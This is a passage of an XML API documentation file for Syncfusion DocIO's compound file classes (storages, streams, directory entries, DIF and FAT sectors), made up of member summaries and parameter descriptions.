        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.#ctor(Syncfusion.CompoundFile.DocIO.Net.CompoundFile,System.String,System.Int32)">
            <summary>
            Initializes new instance of the storage.
            </summary>
            <param name="parent">Parent file.</param>
            <param name="name">Name of the new storage.</param>
            <param name="entryIndex">Index to the directory entry that stores storage information.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.#ctor(Syncfusion.CompoundFile.DocIO.Net.CompoundFile,Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry)">
            <summary>
            Initializes new instance of the storage.
            </summary>
            <param name="parentFile">Parent compound file object.</param>
            <param name="entry">Entry that describes current storage.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.AddItem(System.Int32)">
            <summary>
            
            </summary>
            <param name="entryIndex"></param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.CreateStream(System.String)">
            <summary>
            Creates new stream.
            </summary>
            <param name="streamName">Name of the stream to create.</param>
            <returns>Created stream.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.OpenStream(System.String)">
            <summary>
            Opens stream.
            </summary>
            <param name="streamName">Name of the stream to open.</param>
            <returns>Opened stream or null if there is no such stream.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.DeleteStream(System.String)">
            <summary>
            Removes stream from the storage, if it contains stream with such name.
            </summary>
            <param name="streamName">Stream name to delete.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.ContainsStream(System.String)">
            <summary>
            Checks whether storage contains stream with specified name.
            </summary>
            <param name="streamName">Name of the stream to check.</param>
            <returns>True if storage has stream with such name; false otherwise.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.OpenStorage(System.String)">
            <summary>
            Opens existing storage.
            </summary>
            <param name="storageName">Name of the storage to open.</param>
            <returns>Opened storage item or null if it was impossible to open it.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.DeleteStorage(System.String)">
            <summary>
            Removes substorage from existing storage.
            </summary>
            <param name="storageName">Name of the storage to remove.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.Dispose">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.ContainsStorage(System.String)">
            <summary>
            Checks whether this storage contains substorage with specified name.
            </summary>
            <param name="storageName">Name to check.</param>
            <returns>True if there is such storage; false otherwise.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.Flush">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.GetNodeId(Syncfusion.CompoundFile.DocIO.Net.RBTreeNode)">
            <summary>
            Returns directory entry id that corresponds to the specified node.
            </summary>
            <param name="node"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.Name">
            <summary>
            Returns name of the storage.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.Entry">
            <summary>
            Returns directory entry for this stream.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper">
            <summary>
            This is wrapper over compound stream object. Simply redirects all calls to it
            with one exception - it doesn't dispose underlying stream object.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.m_storage">
            <summary>
            Wrapped storage object.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.#ctor(Syncfusion.CompoundFile.DocIO.Net.CompoundStorage)">
            <summary>
            Initializes new instance of the wrapper.
            </summary>
            <param name="wrapped">Object to wrap.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.Dispose">
            <summary>
            Frees all allocated resources.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.CreateStream(System.String)">
            <summary>
            Creates new stream inside this storage.
            </summary>
            <param name="streamName">Name of the stream to create.</param>
            <returns>Created stream object.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.OpenStream(System.String)">
            <summary>
            Opens existing stream inside this storage.
            </summary>
            <param name="streamName">Name of the stream to open.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.DeleteStream(System.String)">
            <summary>
            Removes existing stream from this storage.
            </summary>
            <param name="streamName">Name of the stream to remove.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.ContainsStream(System.String)">
            <summary>
            Determines whether storage contains specified stream.
            </summary>
            <param name="streamName">Name of the stream to check.</param>
            <returns>true if storage contains specified stream.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.CreateStorage(System.String)">
            <summary>
            Creates new substorage inside this one.
            </summary>
            <param name="storageName">Name of the storage to create.</param>
            <returns>Created storage object.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.OpenStorage(System.String)">
            <summary>
            Opens existing substorage inside this one.
            </summary>
            <param name="storageName">Name of the storage to open.</param>
            <returns>Created storage object.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.DeleteStorage(System.String)">
            <summary>
            Removes exisiting substorage from this one.
            </summary>
            <param name="storageName">Name of the storage to remove.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.ContainsStorage(System.String)">
            <summary>
            Determines whether this storage contains substorage with specified name.
            </summary>
            <param name="storageName">Name of the storage to check.</param>
            <returns>true if storage contains substorage with specified name.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.Flush">
            <summary>
            Commits changes.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.Streams">
            <summary>
            Returns all stream names that are placed inside this stream.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.Storages">
            <summary>
            Returns all storage names that are placed inside this stream.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.Name">
            <summary>
            Returns name of the storage.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStorageWrapper.Entry">
            <summary>
            Returns directory entry for this stream.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamDirect">
            <summary>
            .Net implementation of the compound stream.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet">
            <summary>
            .Net implementation of the compound stream.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.m_parentFile">
            <summary>
            Parent file item.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.m_entry">
            <summary>
            Directory entry of this stream.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.m_stream">
            <summary>
            Stream with data. If it is null, then data hasn't been read yet or stream is closed.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.#ctor(Syncfusion.CompoundFile.DocIO.Net.CompoundFile,Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry)">
            <summary>
            Initializes new instance of the stream.
            </summary>
            <param name="file">Parent file object.</param>
            <param name="entry">Entry that describes this stream item.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.Open">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.Read(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Reads a sequence of bytes from the current stream and advances the position
            within the stream by the number of bytes read. 
            </summary>
            <param name="buffer">An array of bytes. When this method returns, the buffer
            contains the specified byte array with the values between offset and
            (offset + count - 1) replaced by the bytes read from the current source.</param>
            <param name="offset">The zero-based byte offset in buffer at which to begin
            storing the data read from the current stream.</param>
            <param name="length">The maximum number of bytes to be read from the current stream.</param>
            <returns>The total number of bytes read into the buffer. This can be less than
            the number of bytes requested if that many bytes are not currently available,
            or zero (0) if the end of the stream has been reached.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.Write(System.Byte[],System.Int32,System.Int32)">
            <summary>
            writes a sequence of bytes to the current stream and advances the current
            position within this stream by the number of bytes written.
            </summary>
            <param name="buffer">An array of bytes. This method copies count bytes
            from buffer to the current stream.</param>
            <param name="offset">The zero-based byte offset in buffer at which to
            begin copying bytes to the current stream.</param>
            <param name="length">The number of bytes to be written to the current stream.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.Seek(System.Int64,System.IO.SeekOrigin)">
            <summary>
            Sets the position within the current stream. 
            </summary>
            <param name="offset">A byte offset relative to the origin parameter.</param>
            <param name="origin">A value of type SeekOrigin indicating the reference
            point used to obtain the new position.</param>
            <returns>The new position within the current stream.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.SetLength(System.Int64)">
            <summary>
            Sets the length of the current stream.
            </summary>
            <param name="value">The desired length of the current stream in bytes.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.Flush">
            <summary>
            Causes any buffered data to be written to the underlying compound file.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.Dispose(System.Boolean)">
            <summary>
            Releases the unmanaged resources used by the Stream and optionally releases the managed resources.
            </summary>
            <param name="disposing">true to release both managed and unmanaged resources;
            false to release only unmanaged resources.</param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.Entry">
            <summary>
            Returns directory entry for this stream.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.Length">
            <summary>
            Gets the length in bytes of the stream. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.Position">
            <summary>
            Gets or sets the position within the current stream.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.CanRead">
            <summary>
            Gets a value indicating whether the current stream supports reading.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.CanSeek">
            <summary>
            Gets a value indicating whether the current stream supports seeking.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamNet.CanWrite">
            <summary>
            Gets a value indicating whether the current stream supports writing.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamDirect.m_lPosition">
            <summary>
            Stream position.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamDirect.#ctor(Syncfusion.CompoundFile.DocIO.Net.CompoundFile,Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry)">
            <summary>
            Initializes new instance of the stream.
            </summary>
            <param name="file">Parent file object.</param>
            <param name="entry">Entry that describes this stream item.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamDirect.Open">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamDirect.Read(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Reads a sequence of bytes from the current stream and advances the position
            within the stream by the number of bytes read. 
            </summary>
            <param name="buffer">An array of bytes. When this method returns, the buffer
            contains the specified byte array with the values between offset and
            (offset + count - 1) replaced by the bytes read from the current source.</param>
            <param name="offset">The zero-based byte offset in buffer at which to begin
            storing the data read from the current stream.</param>
            <param name="length">The maximum number of bytes to be read from the current stream.</param>
            <returns>The total number of bytes read into the buffer. This can be less than
            the number of bytes requested if that many bytes are not currently available,
            or zero (0) if the end of the stream has been reached.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamDirect.Write(System.Byte[],System.Int32,System.Int32)">
            <summary>
            writes a sequence of bytes to the current stream and advances the current
            position within this stream by the number of bytes written.
            </summary>
            <param name="buffer">An array of bytes. This method copies count bytes
            from buffer to the current stream.</param>
            <param name="offset">The zero-based byte offset in buffer at which to
            begin copying bytes to the current stream.</param>
            <param name="length">The number of bytes to be written to the current stream.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamDirect.Seek(System.Int64,System.IO.SeekOrigin)">
            <summary>
            Sets the position within the current stream. 
            </summary>
            <param name="offset">A byte offset relative to the origin parameter.</param>
            <param name="origin">A value of type SeekOrigin indicating the reference
            point used to obtain the new position.</param>
            <returns>The new position within the current stream.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamDirect.SetLength(System.Int64)">
            <summary>
            Sets the length of the current stream.
            </summary>
            <param name="value">The desired length of the current stream in bytes.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamDirect.Flush">
            <summary>
            Causes any buffered data to be written to the underlying compound file.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamDirect.Length">
            <summary>
            Gets the length in bytes of the stream. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamDirect.Position">
            <summary>
            Gets or sets the position within the current stream.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamWrapper">
            <summary>
            This is wrapper over compound stream object. Simply redirects all calls to it
            with one exception - it doesn't dispose underlying stream object.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamWrapper.m_stream">
            <summary>
            Wrapped stream object.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamWrapper.#ctor(Syncfusion.CompoundFile.DocIO.CompoundStream)">
            <summary>
            Initializes new instance of the wrapper.
            </summary>
            <param name="wrapped">Object to wrap.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamWrapper.Flush">
            <summary>
            Causes any buffered data to be written to the underlying compound file.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamWrapper.Read(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Reads a sequence of bytes from the current stream and advances the position
            within the stream by the number of bytes read. 
            </summary>
            <param name="buffer">An array of bytes. When this method returns, the buffer
            contains the specified byte array with the values between offset and
            (offset + count - 1) replaced by the bytes read from the current source.</param>
            <param name="offset">The zero-based byte offset in buffer at which to begin
            storing the data read from the current stream.</param>
            <param name="count">The maximum number of bytes to be read from the current stream.</param>
            <returns>The total number of bytes read into the buffer. This can be less than
            the number of bytes requested if that many bytes are not currently available,
            or zero (0) if the end of the stream has been reached.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamWrapper.Seek(System.Int64,System.IO.SeekOrigin)">
            <summary>
            Sets the position within the current stream. 
            </summary>
            <param name="offset">A byte offset relative to the origin parameter.</param>
            <param name="origin">A value of type SeekOrigin indicating the reference
            point used to obtain the new position.</param>
            <returns>The new position within the current stream.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamWrapper.SetLength(System.Int64)">
            <summary>
            Sets the length of the current stream.
            </summary>
            <param name="value">The desired length of the current stream in bytes.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamWrapper.Write(System.Byte[],System.Int32,System.Int32)">
            <summary>
            writes a sequence of bytes to the current stream and advances the current
            position within this stream by the number of bytes written.
            </summary>
            <param name="buffer">An array of bytes. This method copies count bytes
            from buffer to the current stream.</param>
            <param name="offset">The zero-based byte offset in buffer at which to
            begin copying bytes to the current stream.</param>
            <param name="count">The number of bytes to be written to the current stream.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamWrapper.Dispose(System.Boolean)">
            <summary>
            
            </summary>
            <param name="disposing"></param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamWrapper.CanRead">
            <summary>
            Gets a value indicating whether the current stream supports reading.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamWrapper.CanSeek">
            <summary>
            Gets a value indicating whether the current stream supports seeking.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamWrapper.CanWrite">
            <summary>
            Gets a value indicating whether the current stream supports writing.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamWrapper.Length">
            <summary>
            Gets the length in bytes of the stream. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundStreamWrapper.Position">
            <summary>
            Gets or sets the position within the current stream.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DIF.SectorsInHeader">
            <summary>
            Number of items in the file header.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DIF.m_arrSectorID">
            <summary>
            List of all fat sector ids.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DIF.m_arrDifSectors">
            <summary>
            List with used Dif sectors.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.DIF.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.DIF.#ctor(System.IO.Stream,Syncfusion.CompoundFile.DocIO.Net.FileHeader)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="header"></param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.DIF.AddDifSectors(System.Int32,Syncfusion.CompoundFile.DocIO.Net.FAT)">
            <summary>
            Adds required number of DIF sectors.
            </summary>
            <param name="sectorCount">Number of sectors to add.</param>
            <param name="fat">FAT object.</param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DIF.SectorIds">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.Directory">
            <summary>
            This class represents directory structure in the compound file.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.Directory.m_lstEntries">
            <summary>
            List of directory entries.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.Directory.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.Directory.#ctor(System.Byte[])">
            <summary>
            Initializes new instance of the directory.
            </summary>
            <param name="data">Data to parse.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.Directory.FindEmpty">
            <summary>
            Searches for empty entry index.
            </summary>
            <returns>Index of the first empty directory entry.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.Directory.Add(Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry)">
            <summary>
            Adds new entry to the collection or replaces existing empty entry with this one.
            </summary>
            <param name="entry">Entry to add.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.Directory.Write(System.IO.Stream)">
            <summary>
            Saves directory entries into specified stream.
            </summary>
            <param name="stream">Stream to save directory into.</param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.Directory.Entries">
            <summary>
            Returns list of directory entries.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry">
            <summary>
            Represents single directory entry in the compound file.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.SizeInFile">
            <summary>
            Size of a single directory entry.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.StreamNameSize">
            <summary>
            Size of the stream name field.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.m_strName">
            <summary>
            Entry name.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.m_entryType">
            <summary>
            Entry type.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.m_color">
            <summary>
            Entry "color" in red-black tree.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.m_leftId">
            <summary>
            Id of the left-sibling.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.m_rightId">
            <summary>
            Id of the right-sibling.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.m_childId">
            <summary>
            Id of the child acting as the root of all the children of thes element (if entry type if Storage).
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.m_storageGuid">
            <summary>
            Storage CLSID.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.m_iStorageFlags">
            <summary>
            User flags of this storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.m_dateCreate">
            <summary>
            Create time-stamp for a storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.m_dateModify">
            <summary>
            Modify time-stamp for a storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.m_iStartSector">
            <summary>
            Starting stream sector.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.m_uiSize">
            <summary>
            Stream size.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.m_iReserved">
            <summary>
            Reserved. Must be zero.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.m_iEntryId">
            <summary>
            Entry id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.LastSector">
            <summary>
            Last sector id.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.#ctor(System.String,Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.EntryType,System.Int32)">
            <summary>
            Initializes new instance of the entry.
            </summary>
            <param name="name">Name of the new entry.</param>
            <param name="type">Type of the new entry.</param>
            <param name="entryId">Id of the new entry.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.#ctor(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Initializes new instance of the entry.
            </summary>
            <param name="data">Data of the new entry.</param>
            <param name="offset">Offset to the entry data.</param>
            <param name="entryId">Entry id.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.Write(System.IO.Stream)">
            <summary>
            Writes directory entry data inside specified stream.
            </summary>
            <param name="stream">Stream to write data into.</param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.Name">
            <summary>
            Entry name.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.Type">
            <summary>
            Entry type.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.Color">
            <summary>
            Entry "color" in red-black tree.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.LeftId">
            <summary>
            Id of the left-sibling.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.RightId">
            <summary>
            Id of the right-sibling.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.ChildId">
            <summary>
            Id of the child acting as the root of all the children of thes element (if entry type if Storage).
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.StorageGuid">
            <summary>
            Storage CLSID.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.StorageFlags">
            <summary>
            User flags of this storage.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.DateCreate">
            <summary>
            Create time-stamp for a storage.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.DateModify">
            <summary>
            Modify time-stamp for a storage.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.StartSector">
            <summary>
            Starting stream sector.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.Size">
            <summary>
            Stream size.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.Reserved">
            <summary>
            Reserved. Must be zero.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.EntryId">
            <summary>
            Returns entry id. Read-only.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.EntryType">
            <summary>
            Possible entry types.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.EntryType.Invalid">
            <summary>
            Invalid entry.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.EntryType.Storage">
            <summary>
            Entry is storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.EntryType.Stream">
            <summary>
            Entry is stream.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.EntryType.Root">
            <summary>
            Root entry.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.DocumentPropertyCollection">
            <summary>
            Document properties enumerator.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DocumentPropertyCollection.m_iFirstSectionOffset">
            <summary>
            Offset to the first section.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.DocumentPropertyCollection.m_lstSections">
            <summary>
            List of all sections.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.DocumentPropertyCollection.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.DocumentPropertyCollection.#ctor(System.IO.Stream)">
            <summary>
            Initializes new instance of the enumerator.
            </summary>
            <param name="stream">Stream to parse.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.DocumentPropertyCollection.ParseSections(System.IO.Stream)">
            <summary>
            Extracts sections data from the stream.
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.DocumentPropertyCollection.ReadHeader(System.IO.Stream)">
            <summary>
            Extracts header information from the stream.
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.DocumentPropertyCollection.WriteSections(System.IO.Stream)">
            <summary>
            Saves all sections into stream.
            </summary>
            <param name="stream">Stream to save sections into.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.DocumentPropertyCollection.WriteHeader(System.IO.Stream)">
            <summary>
            Extracts header information from the stream.
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.DocumentPropertyCollection.Serialize(System.IO.Stream)">
            <summary>
            Saves collection into stream.
            </summary>
            <param name="stream"></param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.DocumentPropertyCollection.Sections">
            <summary>
            Returns list lf all sections.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.FAT">
            <summary>
            This class represents FAT object in the compound file.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FAT.m_lstFatChains">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FAT.m_freeSectors">
            <summary>
            List with free sectors.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FAT.m_usSectorShift">
            <summary>
            Sector size.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FAT.m_stream">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.#ctor(System.IO.Stream,System.UInt16,System.Int32)">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.#ctor(System.IO.Stream,System.UInt16,System.IO.Stream,System.Int32)">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.#ctor(Syncfusion.CompoundFile.DocIO.Net.CompoundFile,System.IO.Stream,Syncfusion.CompoundFile.DocIO.Net.DIF,Syncfusion.CompoundFile.DocIO.Net.FileHeader)">
            <summary>
            Initializes new instance of the fat.
            </summary>
            <param name="file">Parent compound file object.</param>
            <param name="stream">Stream to extract fat from.</param>
            <param name="dif">DIF object to help in parsing</param>
            <param name="header">File header object.</param>
        </member>
